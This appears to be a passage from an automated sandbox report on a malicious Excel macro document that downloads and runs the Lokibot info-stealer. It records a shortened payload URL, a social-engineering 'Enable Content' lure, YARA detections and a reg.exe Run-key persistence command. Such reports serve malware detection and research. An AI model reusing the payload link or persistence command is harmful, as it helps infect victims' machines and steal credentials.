Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly
Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/
Source: powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/qjdJoz4
Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/qjdJoz4PE
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0 Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
Source: Document image extraction number: 0 Screenshot OCR: Enable Content"
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1 Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
Source: Document image extraction number: 1 Screenshot OCR: Enable Content"
Found Excel 4.0 Macro with suspicious formulas
Source: 6Cprm97UTl.xls Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: 6Cprm97UTl.xls Initial sample: Sheet size: 5194
Found obfuscated Excel 4.0 Macro
Source: 6Cprm97UTl.xls Initial sample: High usage of CHAR() function: 16
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\12.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\12.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\ntrwe.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\ntrwe.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to launch a process as a different user
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D5BC0 CreateProcessAsUserW, 15_2_009D5BC0
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_003130D1 11_2_003130D1
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_00318D20 11_2_00318D20
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_003169B0 11_2_003169B0
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_00318240 11_2_00318240
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_00314EF1 11_2_00314EF1
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_0031D3B8 11_2_0031D3B8
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_003197C2 11_2_003197C2
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_00313BC9 11_2_00313BC9
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_00318D10 11_2_00318D10
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_0031DEC8 11_2_0031DEC8
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_0031D3A8 11_2_0031D3A8
Source: C:\Users\user\ntrwe.exe Code function: 15_2_005030D1 15_2_005030D1
Source: C:\Users\user\ntrwe.exe Code function: 15_2_0050D090 15_2_0050D090
Source: C:\Users\user\ntrwe.exe Code function: 15_2_005069B0 15_2_005069B0
Source: C:\Users\user\ntrwe.exe Code function: 15_2_0050EBD0 15_2_0050EBD0
Source: C:\Users\user\ntrwe.exe Code function: 15_2_00503BC9 15_2_00503BC9
Source: C:\Users\user\ntrwe.exe Code function: 15_2_00508D20 15_2_00508D20
Source: C:\Users\user\ntrwe.exe Code function: 15_2_00508520 15_2_00508520
Source: C:\Users\user\ntrwe.exe Code function: 15_2_0050F5B8 15_2_0050F5B8
Source: C:\Users\user\ntrwe.exe Code function: 15_2_00504EF1 15_2_00504EF1
Source: C:\Users\user\ntrwe.exe Code function: 15_2_005097C2 15_2_005097C2
Source: C:\Users\user\ntrwe.exe Code function: 15_2_0050D080 15_2_0050D080
Source: C:\Users\user\ntrwe.exe Code function: 15_2_00508D10 15_2_00508D10
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D24E8 15_2_009D24E8
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D2C18 15_2_009D2C18
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D0A28 15_2_009D0A28
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D4A20 15_2_009D4A20
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D7312 15_2_009D7312
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D5490 15_2_009D5490
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D24D8 15_2_009D24D8
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D0A18 15_2_009D0A18
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D2C08 15_2_009D2C08
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D3D80 15_2_009D3D80
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D61C8 15_2_009D61C8
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D41F8 15_2_009D41F8
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D41E8 15_2_009D41E8
Source: C:\Users\user\ntrwe.exe Code function: 15_2_009D7F40 15_2_009D7F40
Source: C:\Users\user\ntrwe.exe Code function: 16_2_004930D1 16_2_004930D1
Source: C:\Users\user\ntrwe.exe Code function: 16_2_004969B0 16_2_004969B0
Source: C:\Users\user\ntrwe.exe Code function: 16_2_00494EF1 16_2_00494EF1
Source: C:\Users\user\ntrwe.exe Code function: 16_2_00493BC9 16_2_00493BC9
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00253DFE 17_2_00253DFE
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0040549C 17_2_0040549C
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_004029D4 17_2_004029D4
Source: C:\Users\user\ntrwe.exe Code function: 18_2_004030D1 18_2_004030D1
Source: C:\Users\user\ntrwe.exe Code function: 18_2_0040D090 18_2_0040D090
Source: C:\Users\user\ntrwe.exe Code function: 18_2_004069B0 18_2_004069B0
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00403BC9 18_2_00403BC9
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00408515 18_2_00408515
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00408D20 18_2_00408D20
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00404EF1 18_2_00404EF1
Source: C:\Users\user\ntrwe.exe Code function: 18_2_004097C2 18_2_004097C2
Source: C:\Users\user\ntrwe.exe Code function: 18_2_0040D080 18_2_0040D080
Source: C:\Users\user\ntrwe.exe Code function: 18_2_0040DBA0 18_2_0040DBA0
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00408D10 18_2_00408D10
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D40048 18_2_00D40048
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D43818 18_2_00D43818
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D45DA0 18_2_00D45DA0
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D41D58 18_2_00D41D58
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D48640 18_2_00D48640
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D40A30 18_2_00D40A30
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D43F48 18_2_00D43F48
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D474F8 18_2_00D474F8
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D450B0 18_2_00D450B0
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D40006 18_2_00D40006
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D43808 18_2_00D43808
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D46838 18_2_00D46838
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D41D49 18_2_00D41D49
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D45517 18_2_00D45517
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D45528 18_2_00D45528
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D49270 18_2_00D49270
Source: C:\Users\user\ntrwe.exe Code function: 18_2_00D43F39 18_2_00D43F39
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 19_2_01233DFE 19_2_01233DFE
Document contains embedded VBA macros
Source: 6Cprm97UTl.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: String function: 00405B6F appears 42 times
Searches the installation path of Mozilla Firefox
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory Jump to behavior
Uses reg.exe to modify the Windows registry
Source: unknown Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Yara signature match
Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: ntrwe.exe.11.dr, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: ntrwe.exe.11.dr, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.0.12.exe.12a0000.0.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.0.12.exe.12a0000.0.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.12.exe.12a0000.3.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.12.exe.12a0000.3.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 15.0.ntrwe.exe.e90000.0.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.ntrwe.exe.e90000.4.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.ntrwe.exe.e90000.4.unpack, Fe1/Fy1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 16.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.cs Cryptographic APIs: 'CreateDecryptor'
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.spyw.expl.evad.winXLS@27/18@2/3
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 17_2_0040650A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 17_2_0040434D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\B5DE0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCF6F.tmp Jump to behavior
Source: 6Cprm97UTl.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........X.......N.......p............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
